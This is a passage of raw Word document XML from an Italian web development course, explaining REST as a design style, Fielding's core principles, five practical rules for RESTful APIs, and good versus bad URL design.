        <w:t xml:space="preserve">≠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">standard tecnico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">protocollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(HTTP) è un insieme rigido di regole. Uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">stile architetturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(REST) è un insieme di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">principi di progettazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che chi costruisce un sistema decide di seguire (o no). Non c’è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il compilatore REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ti dice se la tua API è REST o no: è una questione di scelta progettuale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il fatto che REST sia uno stile, non un protocollo, ha una conseguenza importante: la maggior parte delle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del mondo reale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non rispetta tutti i principi REST originali di Fielding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo dico perché se andrai a fondo nel tema troverai puristi che dicono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le API che chiamiamo REST non sono vere API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— hanno ragione tecnicamente, ma nella pratica industriale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">è diventato sinonimo di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API HTTP+JSON che usa i verbi HTTP in modo coerente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Useremo questa definizione pragmatica per tutto il corso. Se un giorno lavorerai in un team con un purista, sarà sua premura insegnarti la differenza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="153" w:name="quali-sono-le-idee-centrali-di-rest"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quali sono le idee centrali di REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I principi originali di Fielding sono sei. Per noi i tre più rilevanti sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Architettura client-server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Già vista. Client e server hanno responsabilità separate e comunicano via richieste/risposte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(senza stato lato server). Ogni richiesta deve contenere tutte le informazioni necessarie per essere elaborata. Il server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ricorda lo stato di un client fra una richiesta e l’altra. Conseguenza pratica: un’API REST tipicamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non usa cookie di sessione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma invia ad ogni richiesta un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">token di autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vedi sezione 3b.9). Questo facilita la scalabilità: dieci server identici possono rispondere indifferentemente a richieste dello stesso client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaccia uniforme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tutte le risorse sono manipolate con lo stesso vocabolario di base (i metodi HTTP). Non si inventano verbi nuovi per ogni endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questi tre, insieme alla scelta di usare HTTP + JSON, sono il 95% di quello che ti serve sapere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="155" w:name="X2c02c32a62d355d720c619ae072188e7013a81e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.5 Le 5 regole pratiche di un’API REST decente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tradotte in regole operative quotidiane, le idee di REST diventano queste cinque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola 1 — Tutto è una</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risorsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Non esistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">azioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come endpoint a sé stanti. Esistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risorse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(utenti, messaggi, fatture, ordini) su cui compi operazioni standard. Quindi non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/inviaMessaggio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /messaggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/cancellaUtente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE /utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola 2 — Le risorse stanno in URL ordinati e prevedibili.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Una risorsa singolare ha un URL singolare con un identificatore:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Una collezione ha un URL plurale:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le risorse annidate seguono lo stesso schema:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42/messaggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(i messaggi dell’utente 42).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola 3 — Il metodo HTTP indica l’operazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ogni metodo ha un significato preciso e standardizzato (vedi 3b.7).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola 4 — Il codice di stato della risposta indica l’esito.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Non si restituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">errore: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel body. Si restituisce il codice giusto (</w:t>
      </w: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403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">500</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e il client lo interpreta (vedi 3b.8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola 5 — JSON come formato di richiesta e risposta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, salvo eccezioni motivate (es. caricamento di file).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una API che rispetta queste cinque regole è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RESTful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">agli occhi di qualunque sviluppatore. Vediamole all’opera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="158" w:name="b.6-url-e-risorse-come-si-progettano"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.6 URL e risorse: come si progettano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo come applicare le regole al disegno degli URL di un’API. Diciamo che stiamo costruendo un’API per una bacheca (tipo MiniBlog).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risorse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che esponiamo sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">messaggi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ciascuna risorsa, di solito abbiamo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL di collezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(l’insieme di tutte le risorse di quel tipo):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/messaggi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL di elemento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la singola risorsa, identificata da un ID):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/messaggi/108</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E talvolta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risorse annidate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(relazioni):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utenti/42/messaggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(i messaggi dell’utente 42)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="156" w:name="buone-vs-cattive-scelte-di-url"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buone vs cattive scelte di URL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 Anti-pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ REST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /getUserById?id=42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /utenti/42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /createUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /deleteUser/42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE /utenti/42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /utente/42/cambiaEmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH /utenti/42</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(con body</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{"email": "..."}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /allMessagesOfUser?user=42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /utenti/42/messaggi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">verbi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
